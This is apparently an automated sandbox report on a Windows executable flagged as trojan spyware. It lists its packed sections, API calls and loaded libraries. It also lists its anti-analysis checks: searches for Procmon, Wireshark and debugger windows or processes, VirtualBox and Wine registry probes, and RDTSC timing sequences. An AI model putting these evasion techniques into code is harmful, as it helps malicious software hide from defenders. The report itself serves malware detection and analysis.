Source: EwhnoHx0n5.exeStatic PE information: Section: fnsraptz ZLIB complexity 0.9945907876394052
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0045255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0045255D
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004529FF
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: EwhnoHx0n5.exeVirustotal: Detection: 58%
Source: EwhnoHx0n5.exeReversingLabs: Detection: 57%
Source: EwhnoHx0n5.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: EwhnoHx0n5.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeSection loaded: kernel.appcore.dllJump to behavior
Source: EwhnoHx0n5.exeStatic file information: File size 4462592 > 1048576
Source: EwhnoHx0n5.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: EwhnoHx0n5.exeStatic PE information: Raw size of fnsraptz is bigger than: 0x100000 < 0x1b5200

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeUnpacked PE file: 0.2.EwhnoHx0n5.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fnsraptz:EW;qkzalnio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fnsraptz:EW;qkzalnio:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: EwhnoHx0n5.exeStatic PE information: real checksum: 0x4426da should be: 0x44eeb2
Source: EwhnoHx0n5.exeStatic PE information: section name:
Source: EwhnoHx0n5.exeStatic PE information: section name: .idata
Source: EwhnoHx0n5.exeStatic PE information: section name:
Source: EwhnoHx0n5.exeStatic PE information: section name: fnsraptz
Source: EwhnoHx0n5.exeStatic PE information: section name: qkzalnio
Source: EwhnoHx0n5.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_01843797 push es; ret 0_3_018437DB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018419C1 pushad ; retf 0_3_018419C2
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018436D5 pushad ; ret 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018436ED pushad ; ret 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_01840334 push eax; retf 0_3_01840335
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_0184D278 pushad ; iretd 0_3_0184D279
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_01843797 push es; ret 0_3_018437DB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018419C1 pushad ; retf 0_3_018419C2
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018436D5 pushad ; ret 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018436ED pushad ; ret 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_01840334 push eax; retf 0_3_01840335
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_0184D278 pushad ; iretd 0_3_0184D279
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_01843797 push es; ret 0_3_018437DB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018419C1 pushad ; retf 0_3_018419C2
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018436D5 pushad ; ret 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018436ED pushad ; ret 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_01840334 push eax; retf 0_3_01840335
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_0184D278 pushad ; iretd 0_3_0184D279
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_01843797 push es; ret 0_3_018437DB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018419C1 pushad ; retf 0_3_018419C2
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018436D5 pushad ; ret 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_018436ED pushad ; ret 0_3_018436EB
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_01840334 push eax; retf 0_3_01840335
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_3_0184D278 pushad ; iretd 0_3_0184D279
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007D41D0 push eax; mov dword ptr [esp], edx0_2_007D41D5
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004D2340 push eax; mov dword ptr [esp], 00000000h0_2_004D2343
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0050C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0050C743
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00490AC0 push eax; mov dword ptr [esp], 00000000h0_2_00490AC4
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004B1430 push eax; mov dword ptr [esp], 00000000h0_2_004B1433
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004D39A0 push eax; mov dword ptr [esp], 00000000h0_2_004D39A3
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004ADAD0 push eax; mov dword ptr [esp], edx0_2_004ADAD1
Source: EwhnoHx0n5.exeStatic PE information: section name: fnsraptz entropy: 7.95651354910041

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C97C17 second address: C97C4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA141FCB1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FCBA141FCB5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C97C4A second address: C97C5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C97C5E second address: C97C68 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBA141FCACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA61D3 second address: CA61D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA61D8 second address: CA61F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCBA141FCA6h 0x0000000a jmp 00007FCBA141FCB4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA6393 second address: CA63A3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA141C926h 0x00000008 jns 00007FCBA141C926h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA6699 second address: CA66AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCB2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA9E7E second address: CA9E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA9E96 second address: CA9E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA9E9A second address: B31913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 4DB6EEF1h 0x00000011 mov dword ptr [ebp+122D1C14h], esi 0x00000017 push dword ptr [ebp+122D02B5h] 0x0000001d or dword ptr [ebp+122D3806h], eax 0x00000023 call dword ptr [ebp+122D2508h] 0x00000029 pushad 0x0000002a jmp 00007FCBA141C933h 0x0000002f xor eax, eax 0x00000031 cld 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jmp 00007FCBA141C937h 0x0000003b jns 00007FCBA141C92Bh 0x00000041 mov dword ptr [ebp+122D2930h], eax 0x00000047 add dword ptr [ebp+122D247Eh], esi 0x0000004d mov esi, 0000003Ch 0x00000052 or dword ptr [ebp+122D1BABh], eax 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c sub dword ptr [ebp+122D31A3h], edx 0x00000062 mov dword ptr [ebp+122D1BABh], eax 0x00000068 lodsw 0x0000006a mov dword ptr [ebp+122D23F2h], esi 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 je 00007FCBA141C933h 0x0000007a jmp 00007FCBA141C92Dh 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D31A3h], eax 0x00000089 nop 0x0000008a push edx 0x0000008b push ebx 0x0000008c push eax 0x0000008d push edx 0x0000008e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA9EE1 second address: CA9F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FCBA141FCB5h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e sub dword ptr [ebp+122D247Eh], eax 0x00000014 push 98972293h 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007FCBA141FCACh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CA9F18 second address: CA9F2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C92Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CAA255 second address: CAA28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FCBA141FCBEh 0x0000000b jmp 00007FCBA141FCB8h 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCBA141FCAAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CAA28A second address: CAA28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CAA28E second address: CAA298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CAA298 second address: CAA29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CAA29C second address: CAA2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jc 00007FCBA141FCBBh 0x00000019 jmp 00007FCBA141FCB5h 0x0000001e pop eax 0x0000001f mov esi, 62113684h 0x00000024 lea ebx, dword ptr [ebp+1244BE0Eh] 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007FCBA141FCAAh 0x00000033 jne 00007FCBA141FCA6h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CAA2EB second address: CAA2F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CBC3CE second address: CBC3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CBC3D4 second address: CBC3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C9B271 second address: C9B275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C9B275 second address: C9B27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC8415 second address: CC8437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCBA141FCAFh 0x0000000a pushad 0x0000000b jmp 00007FCBA141FCABh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC871B second address: CC8747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C930h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBA141C933h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC8747 second address: CC874B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC874B second address: CC8755 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA141C926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC88B6 second address: CC88BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC88BC second address: CC88D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C934h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC8DF9 second address: CC8E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC91FD second address: CC9220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FCBA141C939h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC9220 second address: CC9227 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C8F43F second address: C8F44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C8F44D second address: C8F451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC96AD second address: CC96CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA141C934h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC96CB second address: CC96E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC9D06 second address: CC9D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C934h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC9D23 second address: CC9D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC9D27 second address: CC9D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CC9FE0 second address: CC9FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CCA401 second address: CCA41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FCBA141C935h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CCDD61 second address: CCDD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C91030 second address: C91036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C91036 second address: C9103A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C9103A second address: C9103E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD0F01 second address: CD0F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD0F07 second address: CD0F59 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBA141C928h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jp 00007FCBA141C926h 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007FCBA141C92Ch 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007FCBA141C92Ah 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d pushad 0x0000002e push edx 0x0000002f jmp 00007FCBA141C931h 0x00000034 pop edx 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD1062 second address: CD1088 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA141FCB7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FCBA141FCACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD1088 second address: CD108C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD108C second address: CD1096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FCBA141FCA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD1096 second address: CD109A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
